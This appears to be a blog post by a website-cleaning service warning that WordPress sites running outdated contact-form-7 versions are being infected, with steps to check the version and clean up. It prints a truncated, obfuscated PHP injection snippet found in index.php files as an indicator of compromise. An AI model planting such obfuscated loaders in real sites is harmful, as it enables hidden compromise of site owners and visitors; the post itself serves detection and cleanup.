WordPress websites infected through outdated contact-form-7 plugin

Don’t go blaming the author of the WordPress plugin contact-form-7, but 1,022 of the websites we’ve cleaned in the past 11 days have old versions of the contact-form-7 plugin.

If you have a WordPress based website and you’re finding code like this in your index.php files:

(opening php tag) @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZl..."\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} (closing php tag)

then you probably have an outdated contact-form-7 plugin.

We're not seeing the usual evidence in the log files, so we believe that the infection is a string that is being piped to /dev/null - at least that's our theory.

In your wp-content folder under: /plugins/contact-form-7 open your wp-contact-form-7.php file and look at line 8:

/*
Plugin Name: Contact Form 7
Plugin URI: http://contactform7.com/
Description: Just another contact form plugin. Simple but flexible.
Author: Takayuki Miyoshi
Author URI: http://ideasilo.wordpress.com/
Version: 2.4.4
*/

That will tell you what version you have. Or just edit your index.php file in the root of your site. If you have the code listed at the top of the post, then you probably have an outdated version of contact-form-7 also.

I would like to thank Takayuki Miyoshi for assisting us with finding this. Again, don't blame the author, everyone should be updating their plugins on a regular basis.

Your contact-form-7 version should be 3.0.1 which was released on November 3, 2011 and can be obtained here:

On some infected websites you'll also see a "j" and/or a "js" folder in the plugins folder. These need to be removed as they are part of the infection, but not in all cases.

As always you need to scan your files for any backdoors. We've seen some of these infected sites with backdoors and some without with this website infection. This leads me to believe that the hackers feel it's flying under the radar enough that they don't need a backdoor.

If you need help cleaning this off your sites, call me at (847)728-0214 or email me at: traef@wewatchyourwebsite.com